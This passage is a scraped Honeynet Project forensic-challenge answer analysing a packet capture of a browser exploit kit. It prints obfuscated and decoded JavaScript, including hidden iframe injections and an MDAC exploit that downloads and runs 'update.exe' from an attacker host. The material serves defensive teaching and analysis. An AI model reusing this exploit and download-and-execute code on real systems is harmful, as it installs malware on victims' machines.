38
T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010 Challenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at http://www.honeynet.org/challenge2010/ by 17:00 EST, Monday, March 1st 2010. Results will be released on Monday, March 15th 2010. Name (required): vos Email (required): [email protected] Country (optional): Russia Profession (optional): v Student v Security Professional _ Other Question 1. List the protocols found in the capture. What protocol do you think the attack is/are based on? Possible Points: 2pts Tools Used: Wireshark Awarded Points: Answer 1. Protocols found: DHCP, ARP, NetBIOS (NBT), IGMP, ICMP, HTTP, DNS. The attack is based on HTTP: the http stream contains some browser exploits and is used for malware distribution. Question 2. List IPs, hosts names / domain names. What can you tell about it - extrapolate? Possible Points: 4pts Tools Used: Wireshark, CommView Answer 2. 10.0.2.2, 10.0.3.2, 10.0.4.2, 10.0.5.2 (10.0.x.0/24’s gateways) 10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15 (netbios hostname is “8fd12edd2dc1462”) 192.168.1.1 (DNS server) 192.168.56.50 (local domain name “rapidshare.com.eyu32.ru ”) 192.168.56.51 (local domain name “shop.honeynet.sg ”) 192.168.56.52 (local domain name “sploitme.com.cn ”) 209.85.227.99 (domain “www.google.fr ”) The work is licensed under a Creative Commons License . Copyright © The Honeynet Project, 2010 Page 1 of 38

Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

  • Upload
    buique

  • View
    225

  • Download
    1

Embed Size (px)

Citation preview

Page 1: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Challenge 2: Browsers under attack (intermediate)

Submission TemplateSubmit your solution at http://www.honeynet.org/challenge2010/ by 17:00 EST, Monday, March 1st 2010. Results will be released on Monday, March 15th 2010.

Name (required): vos Email (required): [email protected] (optional): Russia Profession (optional):

v Student v Security Professional _ Other

Question 1. List the protocols found in the capture. What protocol do you think the attack is/are based on?

Possible Points: 2pts

Tools Used: WiresharkAwarded Points:Answer 1.

Protocols found: DHCP, ARP, NetBIOS (NBT), IGMP, ICMP, HTTP, DNS.The attack is based on HTTP: the http stream contains some browser exploits and is used for malware distribution.

Question 2. List IPs, hosts names / domain names. What can you tell about it - extrapolate? Possible Points: 4ptsTools Used: Wireshark, CommViewAnswer 2.

10.0.2.2, 10.0.3.2, 10.0.4.2, 10.0.5.2 (10.0.x.0/24’s gateways)10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15 (netbios hostname is “8fd12edd2dc1462”)192.168.1.1 (DNS server)

192.168.56.50 (local domain name “rapidshare.com.eyu32.ru”)192.168.56.51 (local domain name “shop.honeynet.sg”)192.168.56.52 (local domain name “sploitme.com.cn”)209.85.227.99 (domain “www.google.fr”)209.85.227.100 (domain “clients1.google.fr”)209.85.227.106 (domain “www.google.com”)64.236.114.1 (domain “www.honeynet.org”)74.125.77.101 (domain “www.google-analytics.com”)74.125.77.102 (domain “www.google-analytics.com”)

Domains “eyu32.ru” and “sploitme.com.cn” are not delegated, “shop.honeynet.sg” is mapped to a non-private-range IP (203.117.131.40).The 10.0.*.* hosts are sample victims, 192.168.56.50 and .51 — sample compromised third party websites, 192.168.56.52 — sample attacker’s host

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 1 of 30

Page 2: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Question 3. List all the web pages. List those visited containing suspect and possibly malicious javascript and who's is connecting to it? Briefly describe the nature of the malicious web pages

Possible Points: 6pts

Tools Used: Wireshark, CommViewAnswer 3.

Listing only the existing (non-404) text/html pages:

URL Comments

http://rapidshare.com.eyu32.ru/login.php

Connected to by 10.0.2.15 and 10.0.3.15

Contains an encrypted iframe to page http://sploitme.com.cn/?click=3feb5a6b2fDecryption is done easily by replacing eval() and documen-t.write() with alert()

http://sploitme.com.cn/?click=3feb5a6b2f

Connected to by 10.0.2.15 and 10.0.3.15

Sends a redirect to http://sploitme.com.cn/fg/show.php?s=3feb5a6b2fProbably this is a traffic distribution system

http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f

Connected to by 10.0.2.15with User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3

Contains a 404-disguising page with an encrypted javascript, also easily decoded by replacing eval() with alert()The javascript doesn’t contain any malicious behaviour, perhaps because the exploit pack doesn’t contain an exploit for sent User-Agent (Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Fire-fox/3.5.3), which corresponds to Firefox v3.5.3

http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f

First request by 10.0.3.15with User-Agent: Mozilla/4.0 (compati-ble; MSIE 6.0; Windows NT 5.1; SV1)

The decoded javascript contains an MDAC exploit (MS06-014) which has its effect (download&execute a binary) on the browser. The version of the browser is Internet Explorer v6 ac-cordingly to the User-Agent

http://www.honeynet.org/ Contains no malicious content

http://www.google.com/ Sends a redirect to http://www.google.fr/

http://www.google.fr/ Although it contains a cryptic javascript, it’s no malicious

http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f

Second request by 10.0.3.15

The 404-alike page now doesn’t contain any javascript, probably because of an IP ban given by the exploit pack to prevent multi-ple infections of the same victim

http://shop.honeynet.sg/catalog/

Requested by 10.0.4.15

Contains a differently encrypted and inserted iframe to http://sploitme.com.cn/?click=84c090bd86Decryption: replace document.write() with alert()

http://sploitme.com.cn/?click=84c090bd86Requested by 10.0.4.15

Redirect to http://sploitme.com.cn/fg/show.php?s=84c090bd86

http://sploitme.com.cn/fg/show.php?s=84c090bd86

Requested by 10.0.4.15User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Malicious javascript contains following exploits:1. MDAC exploit (MS06-014)2. IWinAmpActiveX exploit (I think it’s not gonna work because of an incorrect “classid”)3. DirectShow exploit (MS09-032)4. MS Access Snapshot Viewer exploit (MS08-041)5. Msdds.dll COM exploit (MS05-052)6. Office Web Components exploit (MS09-043)

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 2 of 30

Page 3: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

The exploits are being executed in a chain, one after another. All exploits are targeted to perform a download&exec of the same binary.

http://sploitme.com.cn/fg/show.php

Requested by 10.0.5.15User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8

The page doesn’t contain malicious content for the same reason as http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f by 10.0.2.15or because no ‘s’ variable is specified

Question 4. Can you sketch an overview of the general actions performed by the attackers? Possible Points: 2ptsTools Used:Answer 4.

1. Force the potential victim to visit the attacker's page by inserting an iframe into other web pages (in this case, http://rapidshare.com.eyu32.ru/login.php and http://shop.honeynet.sg/catalog/)

2. Analyze the sent User-Agent header to determine what vulnerabilities the victim's browser may have3. Send the exploits for these vulnerabilities, the payload for the exploits performs a download&exec

Question 5. What steps are taken to slow the analysis down? Possible Points: 2ptsTools Used:Answer 5.

The attackers took those steps to complicate the analysis:1. The iframe's are somewhat obfuscated in order to hide them from the antiviruses and obscure the malicious page

location from human researcher.2. The malicious page is disguised to look like a 404 page, which is used to confuse the human researcher3. The javascript is coded, this is used to hide the browser exploits from automatic analyzis systems, such as

antiviruses. The human researcher also may have difficulties decoding it.4. The sent exploit set depends on what browser the victim is using. This makes it much harder to determine what

exploits the attacker has.5. The victim's IP address is "banned" by the exploit pack to prevent the researcher from getting the exploits again

from the same IP and thus analyzing them.

Question 6. Provide the javascripts from the pages identified in the previous question. Decode/de-obfuscate them too.

Possible Points: 8pts

Tools Used:Answer 6.

http://rapidshare.com.eyu32.ru/login.php

Original:

<script type="text/javascript">

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('q.r(s("%h%0%6%d%e%7%1%8%9%d%3%4%a%5%2%2%i%j%b%b%9%i%c%k%0%2%7%1%l%3%k%7%l%3%m%b%t%3%c

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 3 of 30

Page 4: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

%0%3%u%4%v%6%1%f%w%e%x%f%y%6%a%z%0%g%2%5%4%n%8%5%1%0%A%5%2%4%n%8%9%2%o%c%1%4%a%B%0%9%0%f%0%c%0%2%o%j%8%5%0%g%g%1%m%a%p%h%b%0%6%d%e%7%1%p%C"));',39,39,'69|65|74|63|3D|68|66|6D|20|73|22|2F|6C|72|61|62|64|3C|70|3A|6F|2E|6E|31|79|3E|document|write|unescape|3F|6B|33|35|36|32|77|67|76|0A'.split('|'),0,{}));

</script>

Deobfuscated:

<iframe src="http://sploitme.com.cn/?click=3feb5a6b2f"width=1 height=1 style="visibil-ity: hidden"></iframe>

http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f (first request with User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3)

Original:

<script language='JavaScript'><!--var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi-jklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromChar-Code(chr2);}if(enc4!=64){output=output+String.fromCharCode(chr3);}}output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string='';var i=0;var c=0,c1=0,c2=0,c3=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(c<128){string+=String.fromCharCode(c);i++;}else if((c>191)&&(c<224)){c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)|(c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}}return string;},obfuscate:function(str){var container='';for(var i=0,z=0;i<str.length;i=i+3,z++){container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z%this.signature.length,z%this.signature.length+1).charCodeAt(0));}return CRYPT.decode(container);}}alert(CRYPT.obfuscate('15718118723119515413516618011712320419515616016915315318717920118519121412814219818916118919619120014010319016512218716218117015316918011714920521417721117115218712018220022319221212612213017014421018421120110414013014618017522919519010616815618819022219117416817212916618312816822319615215116316011516818817122317612213219315715817922818918911816515715518715120319417615615319115319118120115915215112520112217117318815920410412819016615515023119619115215716315414914921119419316114115112417619822319220915312118517215518919215820114017320314317920519219017215713916813713620618919021911014313213711919016420921414313719012217117318815920410412819016615515023119619115215716315414914921119419316114115112417619822319220915312118517215518822221220216211120416512119116218221115713216613617518620017616815812916618312819016417615114210418517816118422216120312512813516812217522220518710217117215517020420117515213013715414911920018418021115214216817517015219521717813717013915612117116219515315616517215017915621619415211012119117518017618618021115213813012416921120022120112016220315715918316320521210515915913414415621321518917313019112419019120115821412616118213715716818722117615811119115719215823620317411010515817713721221317416016314417014917319020121820715412213018714521118716317615817016015615918322518221312715818017615321921218920616513015315717519918618421112813819818816118

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 4 of 30

Page 5: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

9183223202103140199157138205231206190173169157151187213204211207174144170136188200223192225152125139184170151200191193141158130147155149219183186126166183118145209214178189174152187133119200224192211132105131175169173192214204104128190167143187235204208119163171154191223204190219110156163179139199164155222151125168115161184217218182172115143'));//--></script>

Deobfuscated:

<script>function Complete() { setTimeout('location.href = "about:blank', 2000);}

function CheckIP() { var req = null; try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { try { req = new XMLHttpRequest(); } catch (e) {} } } if (req == null) return "0"; req.open("GET", "/fg/show.php?get_ajax=1&r=" + Math.random(), false); req.send(null); if (req.responseText == "1") { return true; } else { return false; }}Complete();</script>

http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f (second request, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1))

Original:

<script language='JavaScript'><!--var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi-jklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromChar-Code(chr2);}if(enc4!=64){output=output+String.fromCharCode(chr3);}}

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 5 of 30

Page 6: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string='';var i=0;var c=0,c1=0,c2=0,c3=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(c<128){string+=String.fromCharCode(c);i++;}else if((c>191)&&(c<224)){c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)|(c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}}return string;},obfuscate:function(str){var container='';for(var i=0,z=0;i<str.length;i=i+3,z++){container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z%this.signature.length,z%this.signature.length+1).charCodeAt(0));}return CRYPT.decode(container);}}eval(CRYPT.obfuscate('157181187231195154135166180117123204195156160169153153187179201185191214128142198189161189196191200140103190165122187162181170153169180117149205214177211171152187120182200223192212126122130170144210184211201104140130146180175229195190106168156188190222191174168172129166183128168223196152151163160115168188171223176122132193157158179228189189118165157155187151203194176156153191153191181201159152151125201122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155189192158201140173203143179205192190172157139168137136206189190219110143132137119190164209214143137190122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155188222212202162111204165121191162182211157132166136175186200176168158129166183128190164176151142104185178161184222161203125128135168122175222205187102171172155170204201175152130137154149119200184180211152142168175170152195217178137170139156121171162195153156165172150179156216194152110121191175180176186180211152138130124169211200221201120162203157159183163205212105159159134144156213215189173130191124190191201158214126161182137157168187221176158111191157192158236203174110105158177137212213174160163144170149173190201218207154122130187145211187163176158170160156159183225182213127158180176153219212189206165130153157175199186184211128138198188161189183223202103140199157138205231206190173169157151187213204211207174144170136188200223192225152125139184170151200191193141158130147155149219183186126166183118145209214178189174152187133119200224192211132105131175169173192214204104128190167143187235204208119163171154191223204190219110156163179121190202179206153142156182171172171215200140174190147154201225206175135173161172127219213157169168152132175119199201191220142104139183147210192223179103144192143121221232195190134171181138175220194156188110131165166126201223176224126125172179169172200223192140103190147154201163205174135158182138156218204194207161128204183180201201159209153125190185169206180174202162140186167142187194181174109169180172179156214215173174127154140128199224192218151122198115170211222161202159103200143178179235196190123102172152128206211215189159154149171188176202155209142142164173168168218214178141170139134180209223181170123175157155187149213216211108153188116189177221184224143141152115161186171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124169213215189157154153153151190223218211142105163178169206233216177174173192141192209171195153123102171117174212204189211108156170115146198201195214126142155179172152196227204141170203147158157231188153139102166117145214204193181101129149166181177185158215155141160171171172192217178124139194168122150171173212161163157134141222189194219101153192175126200220155221129161182175171170171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124173204194185133143191179179190165187214151159190124160151184154192103157193157154209169208191101129181176157149214194177170127154140126203195218212153141135173171172222224201158120154165192205218181191169104171155144204213228152121153191153175201185192183128125151182145150214190192104128194166143182231191153157162180138190211189190219103143170140174199236155171152163168171171172200186178124123197141119171183190151135121158175149149213215189157152165166183180165196207152159148175151189191223185140107132164159175232204212102162180177152212188155169174152132145179200165183213128138198117160189187209204124158203147158154163204174172109182176141222187177177165152188116179177221214151143141130178145150196176187139119192142154216224194173172164157117161213212177189170143169116179180165188224154142198119168173187163201162140133140141205192190172157102182139137184204194173102144170145119176181213158155135194173160189196212200120158190142159217162205213161109183138175222194193156161154203133137190165188215153163168156155151188219193140132130142138201192203190131175180118149219204216184170141151116148184184188188138121181179150152162181192103124130156121204225196186161109183138175222194193156161154203133137190165188215153163

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 6 of 30

Page 7: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

168156155151188219193140132130142138201192191152157132166135144218199156189174154191153192188183155180136124164152156168213218182104103139134180209223181170123106179139144213213215189101154170141188176182171215132105186178170206167224202124140199142138201186188189134164158139157222212178185171144191175186191197226212142141202189161184221181204124158203143181179222204212134165180177157216212173210108154191137192174185196215151125168173169151167154193140107130147159205225205208106175172155149220212156156175144167141189191186213158151175135152172189180214183137123137165192154192204153135162162151148156212227156133153153153188176181213158151175135155170210222154193136158191164158221222195153110171182138157218214173210108152203120155190202196211139125139138168188234214178124128194165176220235181187169176158175145150212211207158151169119186178181213158155135194176171188167212203124162200165176167230196174123160157134179156214215173174127153174128178182222153142142155170169151188219193140132130166193150231196191152157163155145222203194210164128133183138183182213153134176167116149206162156181138123204143155170234188171118170161151174223195189151172131151144190179183196171130160190137148223204163177174173192168119175183185187143122160151156151190190192102135166144187178198176172130121130120150169192172179137119201148193166162188210130175161152156223192216151163130149167126182199179156134161160137153170195222185138131133149154149162184151138174158151178223191212176169136150149137178220175222131160151118148185183156205136153197141122216233183171118104164173136223191227151172131150132190177198171222130122147183152223179225180120102201144139166233183171118173159135136220192174193110128203186181202236171222130122172138148169192172179137119201144139166230183171118173159134120169191174168172130166132190178182171222130122147186148169179154181163102192143138201169184212138176159173136152191177172169132204156121191181154151143141167117147185217157182140131198157142178234196212122107159154152222204215180175156165166186175165221153131122151115149185183227184158103149146155200166182187134103159152152217195190169122133149116142182162196172135160159189153185217228180101132139141192220224207225153125160152144152196212192175130167156190179221195219131122159189148184162158184137127132143155178236185188138173159115148220195191188175136154115181177181206158130122171118148207192176180121161198149177183182183208101102159117148153190190206175132166170187178182214174134102163187153170187225181175143132169154200229180154168104159189179172192228176102136187115191182220180172129138163119148223183222184137162153149138149166184225134106160135170151193174176172131166133128175235225213154102156133148169183158181137161135143155171183187209130170160135153210193189151105131130140119177198187153130138163116149170191158181122128153146143149224182170153109164135137169191174203122132166156187179162183153132137130115148149203226179138127130148155166230183209139125160152140221191191193119135188136124203197205218127105198137150170192174184101136151149176150182187187126106158151152154192215176169135188132120178181154153134176147118152223221156180159135133145178175171180224173171182154191216189190219104151153175186191197210221142163194175160152196228190103162182142159217164195191126157171151120218214193223168133132175180176185163208150163168173171173192204200139102199166122187219205154135175179154124211189174168168131165174128181197206158127175190122160185163213201103132131165158187231206170106160181176157205214177189123152153153187191201159151128121182185160210226214192104135192142155217218182213131162182136141149214178177165143192153119191197209213142104202171170152192218193120153197141121179229205153161161161172170215212156177166144169145119200163222215141137135189171188188228203125128194165180200225183186173172171176183209203157185175141132175171177223226211151163182115168168162226178136161137169158187229205153139109182139145154215156172110152191153122174183176209153125190117161187218186192162166190156122182225204153127167172154149149213155219165142165174126203201184207153125160178146172199218204104103139134180209223181174122166183118153222215194219103143170140174190220155171152163168171171172200186178124123197141120201198195154127166181139152218199156207161152153186181176198222215143159186172146189230218193158158154165192205218181186161109179154160212195156207161143132183145186181209215128142198135169151163225201124140130157154204226185154102162180139149209215154181171152170133186191202188211128121189122173182226227193141136131166180153217206175127103172151187158216194152159143170149177198181210211128142198124173182226218178174169137169152213182204153102173180138157149204189206165133133115146199201188207142175185179150220175167'));//--></script>

Deobfuscated:

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 7 of 30

Page 8: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

<script> function Complete() { setTimeout('location.href = "about:blank', 2000); }

function CheckIP() { var req = null; try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { try { req = new XMLHttpRequest(); } catch (e) {} } } if (req == null) return "0"; req.open("GET", "/fg/show.php?get_ajax=1&r=" + Math.random(), false); req.send(null); if (req.responseText == "1") { return true; } else { return false; } }

var urltofile = 'http://sploitme.com.cn/fg/load.php?e=1'; var filename = 'update.exe';

function CreateO(o, n) { var r = null; try { r = o.CreateObject(n) } catch (e) {} if (!r) { try { r = o.CreateObject(n, '') } catch (e) {} } if (!r) { try { r = o.CreateObject(n, '', '') } catch (e) {} } if (!r) { try { r = o.GetObject('', n) } catch (e) {} } if (!r) { try { r = o.GetObject(n, '') } catch (e) {} } if (!r) { try {

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 8 of 30

Page 9: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

r = o.GetObject(n) } catch (e) {} } return r; }

function Go(a) { var s = CreateO(a, 'WScript.Shell'); var o = CreateO(a, 'ADODB.Stream'); var e = s.Environment('Process'); var xhr = null; var bin = e.Item('TEMP') + '\\' + filename; try { xhr = new XMLHttpRequest(); } catch (e) { try { xhr = new ActiveXObject('Microsoft.XMLHTTP'); } catch (e) { xhr = new ActiveXObject('MSXML2.ServerXMLHTTP'); } } if (!xhr) return (0); xhr.open('GET', urltofile, false) xhr.send(null); var filecontent = xhr.responseBody; o.Type = 1; o.Mode = 3; o.Open(); o.Write(filecontent); o.SaveToFile(bin, 2); s.Run(bin, 0); }

function mdac() { alert('q'); var i = 0; var objects = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null); while (objects[i]) { var a = null; if (objects[i].substring(0, 1) == '{') { a = document.createElement('object'); a.setAttribute('classid', 'clsid:' + objects[i].substring(1, objects[i].length - 1)); } else { try { a = new ActiveXObject(objects[i]); } catch (e) {} } if (a) { try { var b = CreateO(a, 'WScript.Shell'); if (b) { if (Go(a)) {

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 9 of 30

Page 10: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

if (CheckIP()) { Complete(); } else { Complete(); } return true; } } } catch (e) {} } i++; } Complete(); } mdac();</script>

http://shop.honeynet.sg/catalog/

Original:

<script type="text/javascript">var s="=jgsbnf!tsd>#iuuq;00tqmpjunf/dpn/do0@dmjdl>95d1:1ce97#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?";m="";for(i=0;i<s.length;i++){if(s.charCodeAt(i)==28){m+="&";}else if(s.char-CodeAt(i)==23){m+= "!";}else{m+=String.fromCharCode(s.charCodeAt(i)-1);}}document.write(m);</script>

Deobfuscated:

<iframe src="http://sploitme.com.cn/?click=84c090bd86" width=1 height=1 style="visibil-ity: hidden"></iframe>

http://sploitme.com.cn/fg/show.php?s=84c090bd86

Original:

<script language='JavaScript'><!--var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi-jklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromChar-Code(chr2);}if(enc4!=64){output=output+String.fromCharCode(chr3);}}output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string='';var i=0;var c=0,c1=0,c2=0,c3=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(c<128){string+=String.fromCharCode(c);i++;}else if((c>191)&&(c<224)){c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)|(c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}}return string;},obfuscate:function(str){var container='';for(var

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 10 of 30

Page 11: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

i=0,z=0;i<str.length;i=i+3,z++){container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z%this.signature.length,z%this.signature.length+1).charCodeAt(0));}return CRYPT.decode(container);}}alert(CRYPT.obfuscate('157181187231195154135166180117123204195156160169153153187179201185191214128142198189161189196191200140103190165122187162181170153169180117149205214177211171152187120182200223192212126122130170144210184211201104140130146180175229195190106168156188190222191174168172129166183128168223196152151163160115168188171223176122132193157158179228189189118165157155187151203194176156153191153191181201159152151125201122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155189192158201140173203143179205192190172157139168137136206189190219110143132137119190164209214143137190122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155188222212202162111204165121191162182211157132166136175186200176168158129166183128190164176151142104185178161184222161203125128135168122175222205187102171172155170204201175152130137154149119200184180211152142168175170152195217178137170139156121171162195153156165172150179156216194152110121191175180176186180211152138130124169211200221201120162203157159183163205212105159159134144156213215189173130191124190191201158214126161182137157168187221176158111191157192158236203174110105158177137212213174160163144170149173190201218207154122130187145211187163176158170160156159183225182213127158180176153219212189206165130153157175199186184211128138198188161189183223202103140199157138205231206190173169157151187213204211207174144170136188200223192225152125139184170151200191193141158130147155149219183186126166183118145209214178189174152187133119200224192211132105131175169173192214204104128190167143187235204208119163171154191223204190219110156163179121190202179206153142156182171172171215200140174190147154201225206175135173161172127219213157169168152132175119199201191220142104139183147210192223179103144192143121221232195190134171181138175220194156188110131165166126201223176224126125172179169172200223192140103190147154201163205174135158182138156218204194207161128204183180201201159209153125190185169206180174202162140186167142187194181174109169180172179156214215173174127154140128199224192218151122198115170211222161202159103200143178179235196190123102172152128206211215189159154149171188176202155209142142164173168168218214178141170139134180209223181170123175157155187149213216211108153188116189177221184224143141152115161186171211200162140188167138205231182170152164157155120207203194185159151149